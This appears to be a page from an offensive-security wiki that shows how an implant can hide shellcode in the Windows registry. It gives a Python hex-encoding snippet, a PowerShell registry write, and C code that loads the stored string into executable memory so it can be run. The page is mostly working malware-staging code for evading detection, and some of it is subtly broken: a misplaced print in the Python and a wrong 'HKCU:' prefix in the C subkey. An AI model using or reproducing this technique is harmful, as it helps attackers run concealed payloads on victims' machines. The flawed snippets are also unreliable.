Registry Keys

We will store our shellcode as a ASCII string in registry and in our implant, we will read the registry key, convert that string back into hex, and execute that.

To convert your shellcode into an ASCII string, we can use this snippet of code:

try:
	with open(sys.argv[1]) as shellcode:
    bytes = bytearray(shellcode.read())
	shellcode.close()
except IOError:
    print("Error reading file")
    print("".join("{:02X}".format(c) for c in bytes))

You will get an ASCII string in the output, we can put this in registry key so

New-ItemProperty -Path "HKCU:\SOFTWARE\regkey" -Name "Name" -Value "ASCIISTRING" -PropertyType String -Force

In our C Code, we can extract the shellcode from registry like so.

DWORD dwRegistryEntryOneLen;
DWORD dwAllocationSize = shellcodesize;
LPCSTR lpData = (LPCSTR)VirtualAlloc(NULL, dwAllocationSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

DWORD dwType = REG_SZ;
HKEY hKey = 0;
LPCSTR subkey = "HKCU:\SOFTWARE\regkey";
RegOpenKeyA(HKEY_CURRENT_USER,subkey,&hKey);
RegQueryValueExA(hKey, "Name", NULL, &dwType, (LPBYTE)lpData, &dwAllocationSize);

LPCSTR decodedShellcode = (LPCSTR)VirtualAlloc(NULL,dwAllocationSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

LPCSTR tempPointer = decodedShellcode;
	for (int i = 0; i < dwAllocationSize/2; i ++) {
		sscanf_s(lpData+(i*2), "%2hhx", &decodedShellcode[i]);
	}

Shellcode will be stored in decodedShellcode variable.

We can then create a thread executing our shellcode or do whatever is applicable to your situation.

PreviousFile metadata NextADS

Last updated 4 years ago